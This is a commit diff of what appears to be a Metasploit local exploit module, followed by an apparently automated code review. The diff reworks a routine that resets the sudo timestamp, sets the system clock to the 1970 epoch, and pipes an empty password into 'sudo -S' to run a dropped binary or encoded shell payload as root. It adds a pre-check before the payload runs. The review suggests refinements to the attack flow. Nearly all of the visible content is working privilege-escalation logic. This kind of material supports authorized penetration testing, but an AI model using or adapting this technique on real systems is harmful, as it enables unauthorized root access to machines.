Make a test before running the payload
parent
ab293d2ad9
commit
3ce23ffb49
|
@ -160,14 +160,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
private
|
||||
|
||||
def run_sudo_cmd
|
||||
sudo_cmd_raw = if using_native_target?
|
||||
['sudo', '-S', [drop_path].shelljoin].join(' ')
|
||||
elsif using_cmd_target?
|
||||
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
|
||||
end
|
||||
|
||||
## to prevent the password prompt from destroying session
|
||||
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
|
||||
|
||||
print_status("Resetting user's time stamp file and setting clock to the epoch")
|
||||
cmd_exec(
|
||||
|
@ -176,14 +168,37 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
" -setdate 01:01:1970 -settime 00:00"
|
||||
)
|
||||
|
||||
# Run Test
|
||||
test = rand_text_alpha(4 + rand(4))
|
||||
sudo_cmd_test = ['sudo', '-S', ["echo #{test}"].shelljoin].join(' ')
|
||||
|
||||
print_status("Executing test...")
|
||||
output = cmd_exec('echo "" | ' + sudo_cmd_test)
|
||||
|
||||
if output =~ /incorrect password attempts\s*$/i
|
||||
fail_with(Exploit::Failure::NotFound, "User has never run sudo, and is therefore not vulnerable. Bailing.")
|
||||
elsif output =~ /#{test}/
|
||||
print_good("Test executed succesfully. Running payload.")
|
||||
else
|
||||
print_error("Unknown fail while testing, trying to execute the payload anyway...")
|
||||
end
|
||||
|
||||
|
||||
# Run Payload
|
||||
sudo_cmd_raw = if using_native_target?
|
||||
['sudo', '-S', [drop_path].shelljoin].join(' ')
|
||||
elsif using_cmd_target?
|
||||
['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')
|
||||
end
|
||||
|
||||
## to prevent the password prompt from destroying session
|
||||
## backgrounding the sudo payload in order to keep both sessions usable
|
||||
sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
|
||||
|
||||
print_status "Running command: "
|
||||
print_line sudo_cmd
|
||||
output = cmd_exec(sudo_cmd)
|
||||
if output =~ /incorrect password attempts\s*$/i
|
||||
fail_with(Exploit::Failure::NotFound,
|
||||
"User has never run sudo, and is therefore not vulnerable. Bailing.")
|
||||
end
|
||||
#print_good output
|
||||
|
||||
end
|
||||
|
||||
# cmd_exec doesn't allow to get a session, so there is no way to make the cleanup
|
||||
|
|
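Review bot: Both `fail_with` exits added in the second hunk are reached after the `cmd_exec` that sets the system date to the epoch, and nothing in the visible lines puts the clock back, so a run that bails out leaves the host with a 1970 date; that skews log timestamps and can break certificate validation until someone corrects it. The trailing comment says cleanup is not possible after `cmd_exec`, which makes the inconclusive `else` branch worth reconsidering as well: stopping there with `fail_with(Exploit::Failure::Unknown, "Test inconclusive")` changes less on the host than continuing. The `incorrect password attempts` check now appears twice and could move into one small private helper so the two call sites cannot drift apart. `run_sudo_cmd` starts in the first hunk and the date-setting call is only partly visible, so the clock may be restored elsewhere in the file.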